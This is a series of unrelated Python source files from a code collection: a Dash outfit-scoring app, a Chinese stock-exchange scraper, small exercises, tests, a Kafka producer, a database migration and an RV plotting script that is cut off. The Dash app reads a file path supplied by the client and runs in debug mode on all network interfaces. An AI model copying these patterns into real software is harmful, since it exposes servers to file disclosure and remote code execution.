'last_modified')])\ndef update_accessory(fname, content, name, date):\n ctx = dash.callback_context\n triggered = ctx.triggered[0]['prop_id']\n if 'upload' in triggered and content is not None:\n content_type, content_string = content.split(',')\n return 'data:image/png;base64,{}'.format(\n content_string)\n elif fname is not None and os.path.exists(fname):\n encoded_img = base64.b64encode(open(fname, \"rb\").read())\n return 'data:image/png;base64,{}'.format(\n encoded_img.decode())\n\n@app.callback(Output('output-state', 'children'),\n [Input('submit-button', 'n_clicks')],\n [State('top-img', 'src'),\n State('bottom-img', 'src'),\n State('shoe-img', 'src'),\n State('bag-img', 'src'),\n State('accessory-img', 'src')])\ndef update_output(n_clicks, top, bottom, shoe, bag, accessory):\n if n_clicks > 0:\n img_dict = {\n \"top\": top.split(',')[1],\n \"bottom\": bottom.split(',')[1],\n \"shoe\": shoe.split(',')[1],\n \"bag\": bag.split(',')[1],\n \"accessory\": accessory.split(',')[1]\n }\n img_tensor = base64_to_tensor(img_dict)\n img_tensor.unsqueeze_(0)\n relation, score = defect_detect(img_tensor, model)\n relation = relation.squeeze()\n result, order = item_diagnosis(relation, select=[0, 1, 2, 3, 4])\n best_score, best_img_path = retrieve_sub(img_tensor, [0, 1, 2, 3, 4], order)\n\n out = [html.H4(children=\"Revised Outfit\"), html.H4(children=\"Score: {:.4f}\".format(score)), html.H4(children=\"Revised Score: {:.4f}\".format(best_score))]\n\n for part in [\"top\", \"bottom\", \"shoe\", \"bag\", \"accessory\"]:\n if part in best_img_path.keys():\n fname = best_img_path[part]\n encoded_img = base64.b64encode(open(fname, \"rb\").read())\n src= 'data:image/png;base64,{}'.format(encoded_img.decode())\n else:\n src = locals()[part]\n out.append(html.Img(id='{}-img-new'.format(part), style={\"max-height\":\"150px\", \"margin\":\"5px\"}, src=src))\n\n return out\n\ndef item_diagnosis(relation, select):\n \"\"\" Output the most incompatible item in the outfit\n \n Return:\n result (list): Diagnosis value of each item \n order (list): The indices of items ordered by its importance\n \"\"\"\n mats = vec2mat(relation, select)\n for m in mats:\n mask = torch.eye(*m.shape).byte()\n m.masked_fill_(mask, 0)\n result = torch.cat(mats).sum(dim=0)\n order = [i for i, j in sorted(enumerate(result), key=lambda x:x[1], reverse=True)]\n return result, order\n\ndef retrieve_sub(x, select, order):\n \"\"\" Retrieve the datset to substitute the worst item for the best choice.\n \"\"\"\n all_names = {0:'upper', 1:'bottom', 2:'shoe', 3:'bag', 4:'accessory'}\n try_most = 20\n \n best_score = -1\n best_img_path = dict()\n\n for o in order:\n if best_score > 0.9:\n break\n problem_part_idx = select[o]\n problem_part = all_names[problem_part_idx]\n for outfit in random.sample(test_dataset.data, try_most):\n if best_score > 0.9:\n break\n if problem_part in outfit[1]:\n img_path = os.path.join(test_dataset.root_dir, outfit[0], str(outfit[1][problem_part]['index'])) + '.jpg'\n img = Image.open(img_path).convert('RGB')\n img = test_dataset.transform(img).to(device)\n x[0][problem_part_idx] = img\n with torch.no_grad():\n out = model._compute_score(x)\n score = out[0]\n if score.item() > best_score:\n best_score = score.item()\n best_img_path[problem_part] = img_path\n x[0][problem_part_idx] = test_dataset.transform(Image.open(best_img_path[problem_part]).convert('RGB')).to(device)\n \n print('problem_part: {}'.format(problem_part))\n print('best substitution: {} {}'.format(problem_part, best_img_path[problem_part]))\n print('After substitution the score is {:.4f}'.format(best_score))\n return best_score, best_img_path\n\ndef base64_to_tensor(image_bytes_dict):\n my_transforms = transforms.Compose([\n transforms.Resize((224, 224)),\n transforms.ToTensor(),\n ])\n outfit_tensor = []\n for k, v in image_bytes_dict.items():\n img = base64_to_image(v)\n tensor = my_transforms(img)\n outfit_tensor.append(tensor.squeeze())\n outfit_tensor = torch.stack(outfit_tensor)\n outfit_tensor = outfit_tensor.to(device)\n return outfit_tensor\n\ndef base64_to_image(base64_str):\n base64_data = re.sub('^data:image/.+;base64,', '', base64_str)\n byte_data = base64.b64decode(base64_data)\n image_data = io.BytesIO(byte_data)\n img = Image.open(image_data)\n return img\n\nif __name__ == \"__main__\":\n app.run_server(debug=True, host='0.0.0.0')\n\n","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":16841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"50626649","text":"# -*- coding: utf-8 -*-\r\n# 实现, 东方财富的 龙虎榜爬虫 \r\nimport pandas as pd\r\nimport numpy as np\r\nfrom scrapy import Selector\r\nimport urllib\r\nimport urllib.request\r\nimport urllib.error\r\nimport datetime, time\r\nimport re\r\n\r\n\r\ndef dateRange(start, end, step=1, format=\"%Y-%m-%d\"):\r\n strptime, strftime = datetime.datetime.strptime, datetime.datetime.strftime\r\n days = (strptime(end, format) - strptime(start, format)).days \r\n return [strftime(strptime(start, format) + datetime.timedelta(i), format) for i in range(0, days +1 , step)]\r\n \r\ndef Get_LHB_stocks_from_excel(begin_date, end_date):\r\n Timeline = dateRange(begin_date, end_date)\r\n dfs = pd.DataFrame()\r\n for date_id in Timeline:\r\n# print( 'Date: ', date_id )\r\n URL_stocks_infos = r'http://data.eastmoney.com/DataCenter_V3/stock2016/TradeDetail/pagesize=200,page=1,sortRule=-1,sortType=,startDate='+ date_id + ',endDate=' + date_id + ',gpfw=0,js=var%20data_tab_1.html?rt=26442172'\r\n html = urllib.request.urlopen(URL_stocks_infos).read()\r\n html = html.decode('gb2312','ignore')\r\n X = re.split( ',\"url\"' , html )[0]\r\n X = re.split( '\"data\":' , X )[1] \r\n df = pd.read_json( X , orient='records')\r\n if(len(df) != 0 ):\r\n df2 = df[['Tdate', 'SCode', 'SName','JD','ClosePrice', 'Chgradio', 'JmMoney', 'Bmoney', \\\r\n 'Smoney', 'ZeMoney', 'Turnover', 'JmRate', 'ZeRate', 'Dchratio', 'Ltsz', 'Ctypedes' ]]\r\n colunms_name = ['Code', 'Name', '解读', '收盘价', '涨跌幅', '龙虎榜净买额', '龙虎榜买入额', '龙虎榜卖出额', \\\r\n '龙虎榜成交额', '市场总成交额', '净买额占总成交比', '成交额占比' , '换手率', '流通市值', '上榜原因']\r\n df2 = df2.rename( columns = {'Tdate': 'Date', 'SCode': colunms_name[0], 'SName':colunms_name[1], 'JD': colunms_name[2], 'ClosePrice': colunms_name[3] , \\\r\n 'Chgradio': colunms_name[4], 'JmMoney': colunms_name[5], 'Bmoney': colunms_name[6], \\\r\n 'Smoney':colunms_name[7], 'ZeMoney':colunms_name[8], 'Turnover':colunms_name[9], 'JmRate':colunms_name[10], \\\r\n 'ZeRate':colunms_name[11], 'Dchratio':colunms_name[12], 'Ltsz':colunms_name[13], 'Ctypedes':colunms_name[14] } )\r\n df2['Wind_Code'] = str( df2['Code'] )\r\n S_codes = list() \r\n for i in df2['Code']:\r\n if( len( str(i) ) <6 ):\r\n s = '0'*(6-len( str(i) )) + str(i)\r\n else:\r\n s = str(i)\r\n if(s[0] == '6'):\r\n s = s+'.SH'\r\n else:\r\n s = s+'.SZ'\r\n if( len(S_codes) ==0 ):\r\n S_codes = [s]\r\n else:\r\n S_codes.append(s)\r\n df2['Wind_Code'] = S_codes\r\n print( 'Date: ', date_id, '上榜条数: ', len(df2), ', 上榜股票只数: ', len( df2['Wind_Code'].unique() ) )\r\n dfs = dfs.append(df2)\r\n else:\r\n print( 'Date: ', date_id, '上榜条数: ', 0, ', 上榜股票只数: ', 0 )\r\n return dfs\r\n\r\ndef Crawl_web(code, date):\r\n url = 'http://data.eastmoney.com/stock/lhb,'+ date +','+ code[0:6] +'.html'\r\n ########\r\n content = urllib.request.urlopen(url).read()\r\n content = content.decode('gb2312','ignore')\r\n sel = Selector(text = content).xpath('//div[@class=\"data-tips\"]//div[@class=\"left con-br\"]//text()').extract()\r\n Table_datas = pd.DataFrame()\r\n for i in range(len(sel)):\r\n s_type = sel[i].split('类型:')[1]\r\n data1 = Selector(text = content).xpath('//div[@class=\"data-tips\"]//div[@class=\"right\"]//span//text()').extract()\r\n P_close = data1[0]\r\n Rtn = data1[1]\r\n ###################\r\n links_table_buy = Selector(text = content).xpath('//div[@class=\"content-sepe\"]//table[@class=\"default_tab stock-detail-tab\"]//tbody')\r\n links_table_sell = Selector(text = content).xpath('//div[@class=\"content-sepe\"]//table[@class=\"default_tab tab-2\"]//tbody')\r\n ####################\r\n List_buy_top, Table_data_buy = HTML_Parse( [links_table_buy[i]] )\r\n Table_data_buy['ID'] = 'top_buy'\r\n List_sell_top, Table_data_sell = HTML_Parse( [links_table_sell[i]] )\r\n Table_data_sell['ID'] = 'top_sell'\r\n Table_data = pd.concat( [Table_data_buy, Table_data_sell], ignore_index=True)\r\n Table_data['Code'] = code\r\n Table_data['Date'] = date\r\n Table_data['Type'] = s_type\r\n Table_data['P_close'] = P_close\r\n Table_data['Rtn'] = Rtn\r\n Table_datas = Table_datas.append(Table_data)\r\n if(len(Table_datas)>0):\r\n Table_datas = Table_datas[['Code', 'Date', 'Type', 'P_close', 'Rtn', 'ID', 'sec_name', 'amt_buy', 'amt_sell' ]]\r\n return Table_datas \r\n\r\ndef HTML_Parse(links_tables):\r\n List = [] \r\n for ind, link_table in enumerate(links_tables):\r\n links = link_table.xpath('.//tr') \r\n for ind2, link2 in enumerate(links):\r\n sc_name = link2.xpath('.//td//div[@class=\"sc-name\"]//a//text()').extract()\r\n if( len(sc_name) >0):\r\n Amt_buy = link2.xpath('.//td[@style=\"color:red\"]//text()').extract()\r\n Amt_sell = link2.xpath('.//td[@style=\"color:Green\"]//text()').extract()\r\n if(len(Amt_buy)>0):\r\n Amt_buy = Amt_buy[0]\r\n else:\r\n Amt_buy = np.nan\r\n if(len(Amt_sell)>0):\r\n Amt_sell = Amt_sell[0]\r\n else:\r\n Amt_sell = np.nan \r\n# print(sc_name, Amt_buy, Amt_sell)\r\n List.append([sc_name[0], Amt_buy, Amt_sell])\r\n table_data = pd.DataFrame(List)\r\n table_data = table_data.rename(columns = {0:'sec_name', 1:'amt_buy', 2:'amt_sell'})\r\n return List, table_data\r\n\r\ndef main(begin_date, end_date):\r\n Stocks_info = Get_LHB_stocks_from_excel(begin_date, end_date)\r\n Timeline_unique = np.unique(Stocks_info['Date']) \r\n for date in Timeline_unique:\r\n Table_datas = pd.DataFrame() \r\n CODES = Stocks_info[Stocks_info['Date'] == date]['Wind_Code'].unique()\r\n for code in CODES: \r\n df = [] \r\n print('Downloading ......', code, date)\r\n df = Crawl_web(code, date) \r\n repeat_times = 1 \r\n while(len(df) == 0 and repeat_times <= 10 ):\r\n print('...... length 为 0 ...... ', code, date)\r\n time.sleep(60*3)\r\n df = Crawl_web(code, date) \r\n if(len(df)>0):\r\n print('Sucessful Download ......', code, date)\r\n repeat_times = repeat_times + 1\r\n Table_datas = Table_datas.append(df) \r\n str_result_filename = \"./data/龙虎榜具体信息_\"+ str( min(Table_datas['Date'])) + '_'+ str( max(Table_datas['Date'])) + \".xlsx\"\r\n writer = pd.ExcelWriter(str_result_filename) \r\n Table_datas.to_excel(writer, sheet_name = 'LHB' , index=False) \r\n writer.save() \r\n ##########################\r\n str_result_filename = \"./龙虎榜综合信息_\"+ str( min(Stocks_info['Date'])) + '_'+ str( max(Stocks_info['Date'])) + \".xlsx\"\r\n writer = pd.ExcelWriter(str_result_filename) \r\n Stocks_info.to_excel(writer, sheet_name = '龙虎榜日综合数据' , index=False) \r\n writer.save()\r\n return 0 \r\n \r\n########### main function ######################## \r\nif __name__ == '__main__': \r\n begin_date = '2019-12-01' \r\n end_date = '2019-12-31' \r\n# Stocks_info = Get_LHB_stocks_from_excel(begin_date, end_date) \r\n main(begin_date, end_date) \r\n\r\n\r\n\r\n","sub_path":"Update_Download_LHB_from_DFCF.py","file_name":"Update_Download_LHB_from_DFCF.py","file_ext":"py","file_size_in_byte":7771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"522286844","text":"string1=\"Alegria\"\r\n\r\ndef anagrama(string1,Anagram):\r\n string1=string1.lower()\r\n Anagram=Anagram.lower()\r\n for i in string1:\r\n if Anagram.find(i) == -1 or Anagram.count(i) != string1.count(i):\r\n res=\"Não é anagrama\"\r\n break\r\n else:\r\n res=\"É anagrama\"\r\n return res\r\n\r\nprint(anagrama(string1,\"geleira\"))\r\n\r\n","sub_path":"Cap6/Cap6_exos_ficha/Ex 5..py","file_name":"Ex 5..py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"255842711","text":"from nose.tools import raises, eq_\n\nfrom mhctools import NetMHC, NetMHC3, NetMHC4\nfrom mhctools.alleles import normalize_allele_name\n\n\ndef run_class_with_executable(mhc_class, mhc_executable):\n alleles = [normalize_allele_name(\"HLA-A*02:01\")]\n predictor = mhc_class(\n alleles=alleles,\n epitope_lengths=[9],\n program_name=mhc_executable)\n fasta_dictionary = {\n \"SMAD4-001\": \"ASIINFKELA\",\n \"TP53-001\": \"ASILLLVFYW\"\n }\n epitope_collection = predictor.predict(\n fasta_dictionary=fasta_dictionary)\n\n@raises(SystemError)\ndef test_executable_mismatch_3_4():\n run_class_with_executable(NetMHC3, \"netMHC\")\n\n@raises(SystemError)\ndef test_executable_mismatch_4_3():\n run_class_with_executable(NetMHC4, \"netMHC-3.4\")\n\ndef test_wrapper_function():\n alleles = [normalize_allele_name(\"HLA-A*02:01\")]\n wrapped_4 = NetMHC(alleles=alleles,\n epitope_lengths=[9],\n program_name=\"netMHC\")\n eq_(type(wrapped_4), NetMHC4)\n wrapped_3 = NetMHC(alleles=alleles,\n epitope_lengths=[9],\n program_name=\"netMHC-3.4\")\n eq_(type(wrapped_3), NetMHC3)\n\n@raises(SystemError)\ndef test_wrapper_failure():\n alleles = [normalize_allele_name(\"HLA-A*02:01\")]\n NetMHC(alleles=alleles,\n epitope_lengths=[9],\n program_name=\"netMHC-none\")\n","sub_path":"test/test_netmhc_version.py","file_name":"test_netmhc_version.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"310103967","text":"import requests\nimport os\nimport sys\n\ncache = {}\n\n\n# must have at least location parameter\ndef find_restaurants(params):\n \"\"\"Look up restaurant data from Yelp.\"\"\"\n url = 'https://api.yelp.com/v3/businesses/search'\n\n if 'key' not in cache:\n get_auth_key()\n\n headers = {\n 'Authorization': 'Bearer {}'.format(cache['key']),\n }\n\n data = requests.get(url, params=params, headers=headers)\n\n return data\n\n\ndef get_auth_key():\n \"\"\"Retrieve Authorization token from Yelp.\"\"\"\n url = 'https://api.yelp.com/oauth2/token'\n params = {\n 'grant_type': 'client_credentials',\n 'client_id': os.environ['CLIENT_ID'],\n 'client_secret': os.environ['CLIENT_SECRET'],\n }\n\n key = requests.post(url, params).json()['access_token']\n # store key for further requests\n cache['key'] = key\n\n return cache['key']\n\n\ndef get_search_results(params):\n \"\"\"Retrieve prediction results from google autocomplete api.\"\"\"\n url = 'https://maps.googleapis.com/maps/api/place/autocomplete/json?'\n params['key'] = os.environ['API_KEY']\n\n print(params, file=sys.stderr)\n\n results = requests.get(url, params=params)\n\n return results\n","sub_path":"restaurants/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"49246430","text":"# 의도적으로 에러 발생시키기.\n\n# 한자리 숫자에 대해서만 나눗셈을 허용하는 계산기 프로그램.\ntry:\n print(\"한 자리 숫자 나누기 전용 계산기입니다.\")\n num1 = int(input(\"첫 번째 숫자를 입력해주세요 : \"))\n num2 = int(input(\"두 번째 숫자를 입력해주세요 : \"))\n if num1 >= 10 or num2 >= 10: # 특정 조건에 에러를 발생시켜서 except 부분을 실행시킬 수 있다.\n raise ValueError\n print(\"{0} / {1} = {2}\".format(num1, num2, int(num1/num2)))\nexcept ValueError:\n print(\"잘못된 값을 입력하였습니다. 한 자리 숫자만 입력하세요.\") ","sub_path":"files/exceptionPy/generateError.py","file_name":"generateError.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"414780942","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 2 22:11:21 2020\n\n@author: User\n\"\"\"\n\nfrom dataclasses import dataclass, field\nimport json\nimport random\n\nfrom confluent_kafka import Consumer, Producer\nfrom confluent_kafka.admin import AdminClient, NewTopic\nfrom faker import Faker\n\nfaker = Faker()\n\nBROKER_URL = \"PLAINTEXT://localhost:9092\"\nTOPIC_NAME = \"org.udacity.exercise4.purchases\"\n\ndef produce(topic_name):\n '''Produces data synchonously into a Kafka topic'''\n \n p = Producer(\n {\n \"bootstrap.servers\": BROKER_URL,\n \"client.id\": \"client.1234\",\n \"batch.size\": 100,\n \"linger.ms\": 1000,\n \"compression.type\": \"lz4\"\n }\n )\n \n while True:\n p.produce(topic_name, Purchase().serialize())\n \ndef main():\n '''Check for topic and creates the topic if not exist'''\n \n create_topic(TOPIC_NAME)\n try:\n produce(TOPIC_NAME)\n except KeyboardInterrupt as e:\n print(\"shutting down\")\n \ndef create_topic(client):\n '''Creates the topic with the given topic name'''\n client = AdminClient({\"bootstrap.servers\": BROKER_URL})\n futures = client.create_topics(\n [NewTopic(topic=TOPIC_NAME, num_partitions=5, replication_factor=1)]\n )\n for _, future in futures.items():\n try:\n future.result()\n except Exception as e:\n pass\n \n\n@dataclass\nclass Purchase:\n username: str = field(default_factory=faker.user_name)\n currency: str = field(default_factory=faker.currency_code)\n amount: int = field(default_factory=lambda: random.randint(100, 200000))\n \n def serialize(self):\n '''Serialize the obj in JSON string format'''\n return json.dumps(\n {\n \"username\":self.username,\n \"currency\":self.currency,\n \"amount\":self.amount,\n })\n \n \nif __name__ == \"__main__\":\n main()","sub_path":"producer_exercise.py","file_name":"producer_exercise.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"358263500","text":"\"\"\"empty message\n\nRevision ID: 468f4d9b6b05\nRevises: d5db53144449\nCreate Date: 2020-01-15 12:59:34.655925\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '468f4d9b6b05'\ndown_revision = 'd5db53144449'\nbranch_labels = None\ndepends_on = None\n\n# Table for data migration\nsample = sa.sql.table('sample', sa.Column('name', sa.Text()))\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('sample', sa.Column('name', sa.Text(), nullable=True))\n # ### end Alembic commands ###\n # Update existing rows with default value for name\n op.execute(sample.update().values({\"name\": \"Unknown\"}))\n op.alter_column('sample', 'name', existing_type=sa.TEXT(), nullable=False)\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('sample', 'name')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/468f4d9b6b05_.py","file_name":"468f4d9b6b05_.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"409877344","text":"\"\"\"\nenv: py37_emcee2\n\"\"\"\n\nimport radvel\nfrom radvel import driver\nfrom radvel.plot import orbit_plots, mcmc_plots\nfrom radvel.mcmc import statevars\nfrom radvel import plot\nfrom radvel.utils import t_to_phase, fastbin, sigfig\nfrom radvel.driver import load_status, save_status\nimport configparser, os, emcee\n\nimport numpy as np\nimport matplotlib\nfrom matplotlib import rcParams, gridspec\nfrom matplotlib import pyplot as plt\nfrom matplotlib.cm import nipy_spectral\nfrom matplotlib.ticker import MaxNLocator\nfrom matplotlib.offsetbox import AnchoredText\nfrom astropy.time import Time\n\nfrom astropy import units as units, constants as const\n\n##########\n# config #\n##########\nlatex = {\n 'ms': r'm s$^{\\mathregular{-1}}$',\n 'BJDTDB': r'BJD$_{\\mathregular{TDB}}$'\n}\n\ntelfmts_default = {\n 'j': dict(color='C2', marker=u'o', label='HIRES', mew=1),\n 'k': dict(color='k', fmt='s', mfc='none', label='HIRES pre 2004', mew=1),\n 'a': dict(color='g', fmt='d', label='APF'),\n 'pfs': dict(color='magenta', fmt='p', label='PFS'),\n 'CORALIE': dict(color='C0', fmt='d', label='CORALIE'),\n 'h': dict(color='C1', fmt=\"s\", label='HARPS'),\n 'harps-n': dict(color='firebrick', fmt='^', label='HARPS-N'),\n 'l': dict(color='g', fmt='*', label='LICK'),\n}\ntelfmts_default['lick'] = telfmts_default['l']\ntelfmts_default['hires_rj'] = telfmts_default['j']\ntelfmts_default['hires'] = telfmts_default['j']\ntelfmts_default['hires_rk'] = telfmts_default['k']\ntelfmts_default['apf'] = telfmts_default['a']\ntelfmts_default['harps'] = telfmts_default['h']\ntelfmts_default['LICK'] = telfmts_default['l']\ntelfmts_default['HIRES_RJ'] = telfmts_default['j']\ntelfmts_default['HIRES'] = telfmts_default['j']\ntelfmts_default['HIRES_RK'] = telfmts_default['k']\ntelfmts_default['APF'] = telfmts_default['a']\ntelfmts_default['HARPS'] = telfmts_default['h']\ntelfmts_default['HARPS-N'] = telfmts_default['harps-n']\ntelfmts_default['PFS'] = telfmts_default['pfs']\n\n\ncmap = nipy_spectral\nrcParams['font.size'] = 9\nrcParams['lines.markersize'] = 3.5\nrcParams['axes.grid'] = False\ndefault_colors = ['orange', 'purple', 'magenta', 'pink', 'green', 'grey', 'red']\n\nhighlight_format = dict(marker='o', ms=16, mfc='none', mew=2, mec='gold', zorder=99)\n\n\nif not emcee.__version__ == \"2.2.1\":\n raise AssertionError('radvel requires emcee v2')\n\nclass args_object(object):\n \"\"\"\n a minimal version of the \"parser\" object that lets you work with the\n high-level radvel API from python. (without directly using the command line\n interface)\n \"\"\"\n def __init__(self, setupfn, outputdir):\n # return args object with the following parameters set\n self.setupfn = setupfn\n self.outputdir = outputdir\n self.decorr = False\n self.plotkw = {}\n self.gp = False\n\n\ndef limit_plots(args):\n \"\"\"\n Generate plots\n\n Args:\n args (ArgumentParser): command line arguments\n \"\"\"\n\n config_file = args.setupfn\n conf_base = os.path.basename(config_file).split('.')[0]\n statfile = os.path.join(\n args.outputdir, \"{}_radvel.stat\".format(conf_base)\n )\n\n status = load_status(statfile)\n\n assert status.getboolean('fit', 'run'), \\\n \"Must perform max-liklihood fit before plotting\"\n\n postpath = status.get('fit', 'postfile')\n postpath = os.path.join(\n args.outputdir, os.path.basename(postpath)\n )\n if not os.path.exists(postpath):\n raise FileNotFoundError(f'expected posterior file to exist, {post}')\n\n post = radvel.posterior.load(postpath)\n\n # from timmy.driver.soneoff_drivers, 99.7th percetile\n logk1_limit = 4.68726682\n post.params['logk1'] = radvel.Parameter(value=logk1_limit)\n post.params['k1'] = radvel.Parameter(value=np.exp(logk1_limit))\n\n for ptype in args.type:\n print(\"Creating {} plot for {}\".format(ptype, conf_base))\n\n if ptype == 'rv':\n args.plotkw['uparams'] = post.uparams\n saveto = os.path.join(\n args.outputdir,conf_base+'_rvlimit_multipanel.pdf'\n )\n P, _ = radvel.utils.initialize_posterior(config_file)\n if hasattr(P, 'bjd0'):\n args.plotkw['epoch'] = P.bjd0\n\n # import IPython; IPython.embed()\n # P.params (set logk1 to whatever...)\n # assert 0\n\n RVPlot = MultipanelPlot(\n post, saveplot=saveto, **args.plotkw\n )\n RVPlot.plot_multipanel()\n\n savestate = {'{}_plot'.format(ptype): os.path.relpath(saveto)}\n save_status(statfile, 'plot', savestate)\n\n\nclass MultipanelPlot(object):\n \"\"\"\n Class to handle the creation of RV multipanel plots.\n\n Args:\n post (radvel.Posterior): radvel.Posterior object. The model\n plotted will be generated from `post.params`\n epoch (int, optional): epoch to subtract off of all time measurements\n yscale_auto (bool, optional): Use matplotlib auto y-axis\n scaling (default: False)\n yscale_sigma (float, optional): Scale y-axis limits for all panels to be +/-\n yscale_sigma*(RMS of data plotted) if yscale_auto==False\n phase_nrows (int, optional): number of columns in the phase\n folded plots. Default is nplanets.\n phase_ncols (int, optional): number of columns in the phase\n folded plots. Default is 1.\n uparams (dict, optional): parameter uncertainties, must\n contain 'per', 'k', and 'e' keys.\n telfmts (dict, optional): dictionary of dictionaries mapping\n instrument suffix to plotting format code. Example:\n telfmts = {\n 'hires': dict(fmt='o',label='HIRES'),\n 'harps-n' dict(fmt='s')\n }\n legend (bool, optional): include legend on plot? Default: True.\n phase_limits (list, optional): two element list specifying\n pyplot.xlim bounds for phase-folded plots. Useful for\n partial orbits.\n nobin (bool, optional): If True do not show binned data on\n phase plots. Will default to True if total number of\n measurements is less then 20.\n phasetext_size (string, optional): fontsize for text in phase plots.\n Choice of {'xx-small', 'x-small', 'small', 'medium', 'large',\n 'x-large', 'xx-large'}. Default: 'x-small'.\n rv_phase_space (float, optional): amount of space to leave between orbit/residual plot\n and phase plots.\n figwidth (float, optional): width of the figures to be produced.\n Default: 7.5 (spans a page with 0.5 in margins)\n fit_linewidth (float, optional): linewidth to use for orbit model lines in phase-folded\n plots and residuals plots.\n set_xlim (list of float): limits to use for x-axes of the timeseries and residuals plots, in\n JD - `epoch`. Ex: [7000., 70005.]\n text_size (int): set matplotlib.rcParams['font.size'] (default: 9)\n highlight_last (bool): make the most recent measurement much larger in all panels\n show_rms (bool): show RMS of the residuals by instrument in the legend\n legend_kwargs (dict): dict of options to pass to legend (plotted in top panel)\n \"\"\"\n def __init__(self, post, saveplot=None, epoch=2450000, yscale_auto=False,\n yscale_sigma=3.0, phase_nrows=None, phase_ncols=None,\n uparams=None, telfmts={}, legend=True, phase_limits=[],\n nobin=False, phasetext_size='medium', rv_phase_space=0.08,\n figwidth=4.2, fit_linewidth=1.0, set_xlim=None, text_size=11,\n highlight_last=False, show_rms=False,\n legend_kwargs=dict(loc='best')):\n\n self.post = post\n self.saveplot = saveplot\n self.epoch = epoch\n self.yscale_auto = yscale_auto\n self.yscale_sigma = yscale_sigma\n if phase_ncols is None:\n self.phase_ncols = 1\n if phase_nrows is None:\n self.phase_nrows = self.post.likelihood.model.num_planets\n self.uparams = uparams\n self.rv_phase_space = rv_phase_space\n self.telfmts = telfmts\n self.legend = legend\n self.phase_limits = phase_limits\n self.nobin = nobin\n self.phasetext_size = phasetext_size\n self.figwidth = figwidth\n self.fit_linewidth = fit_linewidth\n self.set_xlim = set_xlim\n self.highlight_last = highlight_last\n self.show_rms = show_rms\n self.legend_kwargs = legend_kwargs\n rcParams['font.size'] = text_size\n\n if isinstance(self.post.likelihood, radvel.likelihood.CompositeLikelihood):\n self.like_list = self.post.likelihood.like_list\n else:\n self.like_list = [self.post.likelihood]\n\n # FIGURE PROVISIONING\n # self.ax_rv_height = self.figwidth * 0.6\n # self.ax_phase_height = self.ax_rv_height / 1.4\n self.ax_rv_height = self.figwidth * 0.5\n self.ax_phase_height = self.ax_rv_height\n\n # convert params to synth basis\n synthparams = self.post.params.basis.to_synth(self.post.params)\n self.post.params.update(synthparams)\n\n self.model = self.post.likelihood.model\n self.rvtimes = self.post.likelihood.x\n self.rverr = self.post.likelihood.errorbars()\n self.num_planets = self.model.num_planets\n\n self.rawresid = self.post.likelihood.residuals()\n\n self.resid = (\n self.rawresid + self.post.params['dvdt'].value*(self.rvtimes-self.model.time_base)\n + self.post.params['curv'].value*(self.rvtimes-self.model.time_base)**2\n )\n\n if self.saveplot is not None:\n resolution = 10000\n else:\n resolution = 2000\n\n periods = []\n for i in range(self.num_planets):\n periods.append(synthparams['per%d' % (i+1)].value)\n if len(periods) > 0:\n longp = max(periods)\n else:\n longp = max(self.post.likelihood.x) - min(self.post.likelihood.x)\n\n self.dt = max(self.rvtimes) - min(self.rvtimes)\n self.rvmodt = np.linspace(\n min(self.rvtimes) - 0.05 * self.dt, max(self.rvtimes) + 0.05 * self.dt + longp,\n int(resolution)\n )\n\n self.orbit_model = self.model(self.rvmodt)\n self.rvmod = self.model(self.rvtimes)\n\n if ((self.rvtimes - self.epoch) < -2.4e6).any():\n self.plttimes = self.rvtimes\n self.mplttimes = self.rvmodt\n elif self.epoch == 0:\n self.epoch = 2450000\n self.plttimes = self.rvtimes - self.epoch\n self.mplttimes = self.rvmodt - self.epoch\n else:\n self.plttimes = self.rvtimes - self.epoch\n self.mplttimes = self.rvmodt - self.epoch\n\n self.slope = (\n self.post.params['dvdt'].value * (self.rvmodt-self.model.time_base)\n + self.post.params['curv'].value * (self.rvmodt-self.model.time_base)**2\n )\n self.slope_low = (\n self.post.params['dvdt'].value * (self.rvtimes-self.model.time_base)\n + self.post.params['curv'].value * (self.rvtimes-self.model.time_base)**2\n )\n\n # list for Axes objects\n self.ax_list = []\n\n def plot_timeseries(self, ylim=(-510, 510)):\n \"\"\"\n Make a plot of the RV data and model in the current Axes.\n \"\"\"\n\n ax = plt.gca()\n\n ax.axhline(0, color='k', linestyle=':', linewidth=1)\n\n if self.show_rms:\n rms_values = dict()\n for like in self.like_list:\n inst = like.suffix\n rms = np.std(like.residuals())\n rms_values[inst] = rms\n else:\n rms_values = False\n\n # plot orbit model\n # ax.plot(self.mplttimes, self.orbit_model, 'b-', rasterized=False, lw=self.fit_linewidth)\n\n # plot data\n vels = self.rawresid+self.rvmod\n mtelplot(\n # data = residuals + model\n self.plttimes, vels, self.rverr, self.post.likelihood.telvec, ax, telfmts=self.telfmts,\n rms_values=rms_values\n )\n\n if self.set_xlim is not None:\n ax.set_xlim(self.set_xlim)\n else:\n ax.set_xlim(min(self.plttimes)-0.01*self.dt, max(self.plttimes)+0.01*self.dt)\n plt.setp(ax.get_xticklabels(), visible=False)\n\n if self.highlight_last:\n ind = np.argmax(self.plttimes)\n plt.plot(self.plttimes[ind], vels[ind], **plot.highlight_format)\n\n # legend\n if self.legend:\n ax.legend(numpoints=1, 